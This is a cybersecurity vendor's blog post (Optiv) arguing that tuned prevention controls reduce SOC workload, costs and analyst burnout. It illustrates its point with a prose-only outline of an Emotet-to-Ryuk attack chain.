Every Solution You Can Imagine – and More
What cybersecurity solution do you need? From Zero Trust to ADR, IAM, risk/privacy, data protection, AppSec and threat, securing digital transformation, to resiliency and remediation, we can build the right program to help solve your challenges.
A Single Partner for Everything You Need
Optiv works with more than 450 world-class security technology partners. By putting you at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can.
We Are Optiv
Greatness is every team working toward a common goal. Winning in spite of cyber threats and overcoming challenges in spite of them. It’s building for a future that only you can create or simply coming home in time for dinner.
However you define greatness, Optiv is in your corner. We manage cyber risk so you can secure your full potential.
November 17, 2023
As cybersecurity professionals, we know that security operations centers (SOCs) are invaluable, working to help detect a complex array of attacks and to enable effective and timely response efforts. Reacting to cyberattacks is expensive and time-consuming. Industry studies show the average cost of a data breach is approximately $4 million, and it can take months — or even years — for an organization to fully recover from a cyberattack.
Overall, the average cost of operating an SOC can range from $2 million to $7 million per year, with costs ranging much higher for larger and more complex organizations. A recent Devo SOC performance study adds another layer to this cost: analyst burnout. With SOC professionals citing their “pain level” as a six on a scale of 10, it's evident that burnout is a critical operational risk. Given these challenges, it’s clear we must focus not only on detection, but also on the maturity of our prevention and attack surface reduction strategy to help address the growing operational issues and costs.
With a well-calibrated, prevention-focused approach, you can achieve a balanced and effective SOC operation. This approach enhances SOC resilience and efficiency, reducing both operational strain and financial costs.
You’ve probably heard this saying: “An ounce of prevention is worth a pound of detection and response.” This wisdom holds true: A proactive, preventative approach can significantly contribute to creating and maintaining a healthy SOC. Without tuned prevention, more cyberattacks get through, and when attacks get through, there’s a greater burden on the SOC. Incident response is expensive, and optimized prevention reduces cost.
Today, we are at an inflection point, with the complexity and frequency of cyberattacks escalating, resulting in increased strain on SOCs to respond rapidly and effectively. Real-world threat campaigns are more than just one malicious file or a malicious website generating a drive-by download. They are a combination of multiple threat vectors and techniques.
For example, let’s look at a typical Emotet attack, illustrated in the image above: The attack starts with a phishing email which tricks the user into downloading a weaponized Word document and running a macro. The Word document launches a PowerShell script to download Emotet, a well-known trojanIn turn, Emotet downloads additional payloads like Trickbot, which is designed for various other tasks including harvesting data and stealing credentials, setting the stage for lateral movement. Finally, Trickbot joins the victim’s endpoint to a botnet and downloads other payloads, such as a ransomware called Ryuk.
The recombination of techniques and scenarios is endless. It’s important to realize that there are many attack surfaces where prevention technologies and tactics can be used to disrupt or stop attacks, including:
Despite defenses across all these areas, it's unfortunate that attacks still manage to penetrate and succeed.
Does this mean that prevention is broken or ineffective? Or is it possible that organizations aren’t using all the prevention tools at their disposal, or they haven’t tuned their prevention stacks well? The two questions an organization should answer are:
In this blog post, we won't cover every control and lever available to you. Instead, we'll focus on highlighting specific control types within an attack chain and discuss how to strategically layer these preventive measures for improved security outcomes, as demonstrated in the following graphic.
The graphic highlights a few different control types across an attack chain. At the top is the MITRE ATT&ACK adversary tactics, which are broad categories of techniques attackers typically use (starting left to right) to attempt to compromise your networks and data.
At the bottom of the graphic (in the boxes) are various control categories that function best in defending against those specific tactics:
The last category (detection and response) is your SOC. Any events that make it to this category create work for your analysts.
Various effective controls and strategies can be implemented to tackle operational challenges, alleviate analyst fatigue and reduce overall costs. Elements like host intrusion prevention, endpoint security, host firewalls and network integrity are vital. Additionally, methods for countering zero-day threats, file reputation analysis, behavioral monitoring, emulators, advanced machine learning and endpoint file inspection technologies all contribute to a comprehensive prevention strategy.
Many clients are unaware that disabling or misconfiguring these engines can significantly compromise their threat defense capabilities. I recommend that clients engage with a cybersecurity provider for a periodic “health check” to help you understand your current security posture, the capabilities of various controls and how they interoperate. Utilizing the “monitoring mode” available in many security controls can help maximize several benefits:
It’s time to revisit prevention methods and strategies for reducing the attack surface. By doing so, you can address operational challenges, mitigate the financial risks of cybersecurity incidents and optimize overall SOC costs. Together, we can achieve a more balanced and effective SOC operation, one that is more resilient and efficient, reducing both operational strain and financial costs.
Optiv Security: Secure greatness.®
Optiv is the cyber advisory and solutions leader, delivering strategic and technical expertise to nearly 6,000 companies across every major industry. We partner with organizations to advise, deploy and operate complete cybersecurity programs from strategy and managed security services to risk, integration and technology solutions. With clients at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can. At Optiv, we manage cyber risk so you can secure your full potential. For more information, visit www.optiv.com.
Let us know what you need, and we will have an Optiv professional contact you shortly.